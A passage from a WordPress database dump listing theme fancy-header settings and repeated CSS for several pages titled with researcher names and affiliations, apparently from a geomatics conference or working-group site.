.breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(11773,2500,'_dt_fancy_header_layout_heading',''),
(11774,2500,'_dt_fancy_header_title_aligment','center'),
(11775,2500,'_dt_fancy_header_height','300'),
(11776,2500,'_dt_fancy_header_padding-top','0px'),
(11777,2500,'_dt_fancy_header_padding-bottom','0px'),
(11778,2500,'_dt_fancy_header_breadcrumbs_heading',''),
(11779,2500,'_dt_fancy_header_breadcrumbs','disabled'),
(11780,2500,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(11781,2500,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(11782,2500,'_dt_fancy_header_title_heading',''),
(11783,2500,'_dt_fancy_header_title_mode','custom'),
(11784,2500,'_dt_fancy_header_title','Dr. Hao Wu, National Geomatics Center of China'),
(11785,2500,'_dt_fancy_header_title_font_size','30'),
(11786,2500,'_dt_fancy_header_title_line_height','36'),
(11787,2500,'_dt_fancy_header_text_transform','none'),
(11788,2500,'_dt_fancy_header_title_color_mode','color'),
(11789,2500,'_dt_fancy_header_title_color','#ffffff'),
(11790,2500,'_dt_fancy_header_subtitle_heading',''),
(11791,2500,'_dt_fancy_header_subtitle',''),
(11792,2500,'_dt_fancy_header_subtitle_font_size','18'),
(11793,2500,'_dt_fancy_header_subtitle_line_height','26'),
(11794,2500,'_dt_fancy_header_subtitle_text_transform','none'),
(11795,2500,'_dt_fancy_header_subtitle_color_mode','color'),
(11796,2500,'_dt_fancy_header_subtitle_color','#ffffff'),
(11797,2500,'_dt_fancy_header_bg_heading',''),
(11798,2500,'_dt_fancy_header_bg_color','#222222'),
(11799,2500,'_dt_fancy_header_bg_image_origin','custom'),
(11800,2500,'_dt_fancy_header_bg_image','a:0:{}'),
(11801,2500,'_dt_fancy_header_bg_repeat','no-repeat'),
(11802,2500,'_dt_fancy_header_bg_position_x','center'),
(11803,2500,'_dt_fancy_header_bg_position_y','center'),
(11804,2500,'_dt_fancy_header_bg_fullscreen','1'),
(11805,2500,'_dt_fancy_header_bg_overlay','0'),
(11806,2500,'_dt_fancy_header_overlay_color','#000'),
(11807,2500,'_dt_fancy_header_bg_overlay_opacity','50'),
(11808,2500,'_dt_fancy_header_scroll_effect','default'),
(11809,2500,'_dt_fancy_header_bg_parallax','0.5'),
(11810,2500,'_dt_fancy_header_responsiveness_heading',''),
(11811,2500,'_dt_fancy_header_responsiveness','enabled'),
(11812,2500,'_dt_fancy_header_responsiveness_switch','778px'),
(11813,2500,'_dt_fancy_header_responsive_height','70'),
(11814,2500,'_dt_fancy_header_responsive_font_size','30'),
(11815,2500,'_dt_fancy_header_responsive_title_line_height','38'),
(11816,2500,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(11817,2500,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(11818,2500,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(11819,2500,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(11820,2541,'_dt_fancy_header_layout_heading',''),
(11821,2541,'_dt_fancy_header_title_aligment','center'),
(11822,2541,'_dt_fancy_header_height','300'),
(11823,2541,'_dt_fancy_header_padding-top','0px'),
(11824,2541,'_dt_fancy_header_padding-bottom','0px'),
(11825,2541,'_dt_fancy_header_breadcrumbs_heading',''),
(11826,2541,'_dt_fancy_header_breadcrumbs','disabled'),
(11827,2541,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(11828,2541,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(11829,2541,'_dt_fancy_header_title_heading',''),
(11830,2541,'_dt_fancy_header_title_mode','custom'),
(11831,2541,'_dt_fancy_header_title','Jonathan Li, University of Waterloo, Canada (WG I/4)'),
(11832,2541,'_dt_fancy_header_title_font_size','30'),
(11833,2541,'_dt_fancy_header_title_line_height','36'),
(11834,2541,'_dt_fancy_header_text_transform','none'),
(11835,2541,'_dt_fancy_header_title_color_mode','color'),
(11836,2541,'_dt_fancy_header_title_color','#ffffff'),
(11837,2541,'_dt_fancy_header_subtitle_heading',''),
(11838,2541,'_dt_fancy_header_subtitle',''),
(11839,2541,'_dt_fancy_header_subtitle_font_size','18'),
(11840,2541,'_dt_fancy_header_subtitle_line_height','26'),
(11841,2541,'_dt_fancy_header_subtitle_text_transform','none'),
(11842,2541,'_dt_fancy_header_subtitle_color_mode','color'),
(11843,2541,'_dt_fancy_header_subtitle_color','#ffffff'),
(11844,2541,'_dt_fancy_header_bg_heading',''),
(11845,2541,'_dt_fancy_header_bg_color','#222222'),
(11846,2541,'_dt_fancy_header_bg_image_origin','custom'),
(11847,2541,'_dt_fancy_header_bg_image','a:0:{}'),
(11848,2541,'_dt_fancy_header_bg_repeat','no-repeat'),
(11849,2541,'_dt_fancy_header_bg_position_x','center'),
(11850,2541,'_dt_fancy_header_bg_position_y','center'),
(11851,2541,'_dt_fancy_header_bg_fullscreen','1'),
(11852,2541,'_dt_fancy_header_bg_overlay','0'),
(11853,2541,'_dt_fancy_header_overlay_color','#000'),
(11854,2541,'_dt_fancy_header_bg_overlay_opacity','50'),
(11855,2541,'_dt_fancy_header_scroll_effect','default'),
(11856,2541,'_dt_fancy_header_bg_parallax','0.5'),
(11857,2541,'_dt_fancy_header_responsiveness_heading',''),
(11858,2541,'_dt_fancy_header_responsiveness','enabled'),
(11859,2541,'_dt_fancy_header_responsiveness_switch','778px'),
(11860,2541,'_dt_fancy_header_responsive_height','70'),
(11861,2541,'_dt_fancy_header_responsive_font_size','30'),
(11862,2541,'_dt_fancy_header_responsive_title_line_height','38'),
(11863,2541,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(11864,2541,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(11865,2541,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(11866,2541,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(11867,2539,'_dt_fancy_header_layout_heading',''),
(11868,2539,'_dt_fancy_header_title_aligment','center'),
(11869,2539,'_dt_fancy_header_height','300'),
(11870,2539,'_dt_fancy_header_padding-top','0px'),
(11871,2539,'_dt_fancy_header_padding-bottom','0px'),
(11872,2539,'_dt_fancy_header_breadcrumbs_heading',''),
(11873,2539,'_dt_fancy_header_breadcrumbs','disabled'),
(11874,2539,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(11875,2539,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(11876,2539,'_dt_fancy_header_title_heading',''),
(11877,2539,'_dt_fancy_header_title_mode','custom'),
(11878,2539,'_dt_fancy_header_title','Naser El-Sheimy'),
(11879,2539,'_dt_fancy_header_title_font_size','30'),
(11880,2539,'_dt_fancy_header_title_line_height','36'),
(11881,2539,'_dt_fancy_header_text_transform','none'),
(11882,2539,'_dt_fancy_header_title_color_mode','color'),
(11883,2539,'_dt_fancy_header_title_color','#ffffff'),
(11884,2539,'_dt_fancy_header_subtitle_heading',''),
(11885,2539,'_dt_fancy_header_subtitle',''),
(11886,2539,'_dt_fancy_header_subtitle_font_size','18'),
(11887,2539,'_dt_fancy_header_subtitle_line_height','26'),
(11888,2539,'_dt_fancy_header_subtitle_text_transform','none'),
(11889,2539,'_dt_fancy_header_subtitle_color_mode','color'),
(11890,2539,'_dt_fancy_header_subtitle_color','#ffffff'),
(11891,2539,'_dt_fancy_header_bg_heading',''),
(11892,2539,'_dt_fancy_header_bg_color','#222222'),
(11893,2539,'_dt_fancy_header_bg_image_origin','custom'),
(11894,2539,'_dt_fancy_header_bg_image','a:0:{}'),
(11895,2539,'_dt_fancy_header_bg_repeat','no-repeat'),
(11896,2539,'_dt_fancy_header_bg_position_x','center'),
(11897,2539,'_dt_fancy_header_bg_position_y','center'),
(11898,2539,'_dt_fancy_header_bg_fullscreen','1'),
(11899,2539,'_dt_fancy_header_bg_overlay','0'),
(11900,2539,'_dt_fancy_header_overlay_color','#000'),
(11901,2539,'_dt_fancy_header_bg_overlay_opacity','50'),
(11902,2539,'_dt_fancy_header_scroll_effect','default'),
(11903,2539,'_dt_fancy_header_bg_parallax','0.5'),
(11904,2539,'_dt_fancy_header_responsiveness_heading',''),
(11905,2539,'_dt_fancy_header_responsiveness','enabled'),
(11906,2539,'_dt_fancy_header_responsiveness_switch','778px'),
(11907,2539,'_dt_fancy_header_responsive_height','70'),
(11908,2539,'_dt_fancy_header_responsive_font_size','30'),
(11909,2539,'_dt_fancy_header_responsive_title_line_height','38'),
(11910,2539,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(11911,2539,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(11912,2539,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(11913,2539,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(11914,2537,'_dt_fancy_header_layout_heading',''),
(11915,2537,'_dt_fancy_header_title_aligment','center'),
(11916,2537,'_dt_fancy_header_height','300'),
(11917,2537,'_dt_fancy_header_padding-top','0px'),
(11918,2537,'_dt_fancy_header_padding-bottom','0px'),
(11919,2537,'_dt_fancy_header_breadcrumbs_heading',''),
(11920,2537,'_dt_fancy_header_breadcrumbs','disabled'),
(11921,2537,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(11922,2537,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(11923,2537,'_dt_fancy_header_title_heading',''),
(11924,2537,'_dt_fancy_header_title_mode','generic'),
(11925,2537,'_dt_fancy_header_title',''),
(11926,2537,'_dt_fancy_header_title_font_size','30'),
(11927,2537,'_dt_fancy_header_title_line_height','36'),
(11928,2537,'_dt_fancy_header_text_transform','none'),
(11929,2537,'_dt_fancy_header_title_color_mode','color'),
(11930,2537,'_dt_fancy_header_title_color','#ffffff'),
(11931,2537,'_dt_fancy_header_subtitle_heading',''),
(11932,2537,'_dt_fancy_header_subtitle',''),
(11933,2537,'_dt_fancy_header_subtitle_font_size','18'),
(11934,2537,'_dt_fancy_header_subtitle_line_height','26'),
(11935,2537,'_dt_fancy_header_subtitle_text_transform','none'),
(11936,2537,'_dt_fancy_header_subtitle_color_mode','color'),
(11937,2537,'_dt_fancy_header_subtitle_color','#ffffff'),
(11938,2537,'_dt_fancy_header_bg_heading',''),
(11939,2537,'_dt_fancy_header_bg_color','#222222'),
(11940,2537,'_dt_fancy_header_bg_image_origin','custom'),
(11941,2537,'_dt_fancy_header_bg_image','a:0:{}'),
(11942,2537,'_dt_fancy_header_bg_repeat','no-repeat'),
(11943,2537,'_dt_fancy_header_bg_position_x','center'),
(11944,2537,'_dt_fancy_header_bg_position_y','center'),
(11945,2537,'_dt_fancy_header_bg_fullscreen','1'),
(11946,2537,'_dt_fancy_header_bg_overlay','0'),
(11947,2537,'_dt_fancy_header_overlay_color','#000'),
(11948,2537,'_dt_fancy_header_bg_overlay_opacity','50'),
(11949,2537,'_dt_fancy_header_scroll_effect','default'),
(11950,2537,'_dt_fancy_header_bg_parallax','0.5'),
(11951,2537,'_dt_fancy_header_responsiveness_heading',''),
(11952,2537,'_dt_fancy_header_responsiveness','enabled'),
(11953,2537,'_dt_fancy_header_responsiveness_switch','778px'),
(11954,2537,'_dt_fancy_header_responsive_height','70'),
(11955,2537,'_dt_fancy_header_responsive_font_size','30'),
(11956,2537,'_dt_fancy_header_responsive_title_line_height','38'),
(11957,2537,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(11958,2537,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(11959,2537,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(11960,2537,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(11961,2535,'_dt_fancy_header_layout_heading',''),
(11962,2535,'_dt_fancy_header_title_aligment','center'),
(11963,2535,'_dt_fancy_header_height','300'),
(11964,2535,'_dt_fancy_header_padding-top','0px'),
(11965,2535,'_dt_fancy_header_padding-bottom','0px'),
(11966,2535,'_dt_fancy_header_breadcrumbs_heading',''),
(11967,2535,'_dt_fancy_header_breadcrumbs','disabled'),
(11968,2535,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(11969,2535,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(11970,2535,'_dt_fancy_header_title_heading',''),
(11971,2535,'_dt_fancy_header_title_mode','generic'),
(11972,2535,'_dt_fancy_header_title',''),
(11973,2535,'_dt_fancy_header_title_font_size','30'),
(11974,2535,'_dt_fancy_header_title_line_height','36'),
(11975,2535,'_dt_fancy_header_text_transform','none'),
(11976,2535,'_dt_fancy_header_title_color_mode','color'),
(11977,2535,'_dt_fancy_header_title_color','#ffffff'),
(11978,2535,'_dt_fancy_header_subtitle_heading',''),
(11979,2535,'_dt_fancy_header_subtitle',''),
(11980,2535,'_dt_fancy_header_subtitle_font_size','18'),
(11981,2535,'_dt_fancy_header_subtitle_line_height','26'),
(11982,2535,'_dt_fancy_header_subtitle_text_transform','none'),
(11983,2535,'_dt_fancy_header_subtitle_color_mode','color'),
(11984,2535,'_dt_fancy_header_subtitle_color','#ffffff'),
(11985,2535,'_dt_fancy_header_bg_heading',''),
(11986,2535,'_dt_fancy_header_bg_color','#222222'),
(11987,2535,'_dt_fancy_header_bg_image_origin','custom'),
(11988,2535,'_dt_fancy_header_bg_image','a:0:{}'),
(11989,2535,'_dt_fancy_header_bg_repeat','no-repeat'),
(11990,2535,'_dt_fancy_header_bg_position_x','center'),
(11991,2535,'_dt_fancy_header_bg_position_y','center'),
(11992,2535,'_dt_fancy_header_bg_fullscreen','1'),
(11993,2535,'_dt_fancy_header_bg_overlay','0'),
(11994,2535,'_dt_fancy_header_overlay_color','#000'),
(11995,2535,'_dt_fancy_header_bg_overlay_opacity','50'),
(11996,2535,'_dt_fancy_header_scroll_effect','default'),
(11997,2535,'_dt_fancy_header_bg_parallax','0.5'),
(11998,2535,'_dt_fancy_header_responsiveness_heading',''),
(11999,2535,'_dt_fancy_header_responsiveness','enabled'),
(12000,2535,'_dt_fancy_header_responsiveness_switch','778px'),
(12001,2535,'_dt_fancy_header_responsive_height','70'),
(12002,2535,'_dt_fancy_header_responsive_font_size','30'),
(12003,2535,'_dt_fancy_header_responsive_title_line_height','38'),
(12004,2535,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(12005,2535,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(12006,2535,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(12007,2535,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(12008,2543,'_dt_fancy_header_layout_heading',''),
(12009,2543,'_dt_fancy_header_title_aligment','center'),
(12010,2543,'_dt_fancy_header_height','300'),
(12011,2543,'_dt_fancy_header_padding-top','0px'),
(12012,2543,'_dt_fancy_header_padding-bottom','0px'),
(12013,2543,'_dt_fancy_header_breadcrumbs_heading',''),
(12014,2543,'_dt_fancy_header_breadcrumbs','disabled'),
(12015,2543,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(12016,2543,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(12017,2543,'_dt_fancy_header_title_heading',''),
(12018,2543,'_dt_fancy_header_title_mode','custom'),
(12019,2543,'_dt_fancy_header_title','Yiping Chen   ,    Sun Yat-sen University, China (WG I/4)'),
(12020,2543,'_dt_fancy_header_title_font_size','30'),
(12021,2543,'_dt_fancy_header_title_line_height','36'),
(12022,2543,'_dt_fancy_header_text_transform','none'),
(12023,2543,'_dt_fancy_header_title_color_mode','color'),
(12024,2543,'_dt_fancy_header_title_color','#ffffff'),
(12025,2543,'_dt_fancy_header_subtitle_heading',''),
(12026,2543,'_dt_fancy_header_subtitle',''),
(12027,2543,'_dt_fancy_header_subtitle_font_size','18'),
(12028,2543,'_dt_fancy_header_subtitle_line_height','26'),
(12029,2543,'_dt_fancy_header_subtitle_text_transform','none'),
(12030,2543,'_dt_fancy_header_subtitle_color_mode','color'),
(12031,2543,'_dt_fancy_header_subtitle_color','#ffffff'),
(12032,2543,'_dt_fancy_header_bg_heading',''),
(12033,2543,'_dt_fancy_header_bg_color','#222222'),
(12034,2543,'_dt_fancy_header_bg_image_origin','custom'),
(12035,2543,'_dt_fancy_header_bg_image','a:0:{}'),
(12036,2543,'_dt_fancy_header_bg_repeat','no-repeat'),
(12037,2543,'_dt_fancy_header_bg_position_x','center'),
(12038,2543,'_dt_fancy_header_bg_position_y','center'),
(12039,2543,'_dt_fancy_header_bg_fullscreen','1'),
(12040,2543,'_dt_fancy_header_bg_overlay','0'),
(12041,2543,'_dt_fancy_header_overlay_color','#000'),
(12042,2543,'_dt_fancy_header_bg_overlay_opacity','50'),
(12043,2543,'_dt_fancy_header_scroll_effect','default'),
(12044,2543,'_dt_fancy_header_bg_parallax','0.5'),
(12045,2543,'_dt_fancy_header_responsiveness_heading',''),
(12046,2543,'_dt_fancy_header_responsiveness','enabled'),
(12047,2543,'_dt_fancy_header_responsiveness_switch','778px'),
(12048,2543,'_dt_fancy_header_responsive_height','70'),
(12049,2543,'_dt_fancy_header_responsive_font_size','30'),
(12050,2543,'_dt_fancy_header_responsive_title_line_height','38'),
(12051,2543,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(12052,2543,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(12053,2543,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(12054,2543,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(12055,2545,'_dt_fancy_header_layout_heading',''),
(12056,2545,'_dt_fancy_header_title_aligment','center'),
(12057,2545,'_dt_fancy_header_height','300'),
(12058,2545,'_dt_fancy_header_padding-top','0px'),
(12059,2545,'_dt_fancy_header_padding-bottom','0px'),
(12060,2545,'_dt_fancy_header_breadcrumbs_heading',''),
(12061,2545,'_dt_fancy_header_breadcrumbs','disabled'),
(12062,2545,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(12063,2545,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
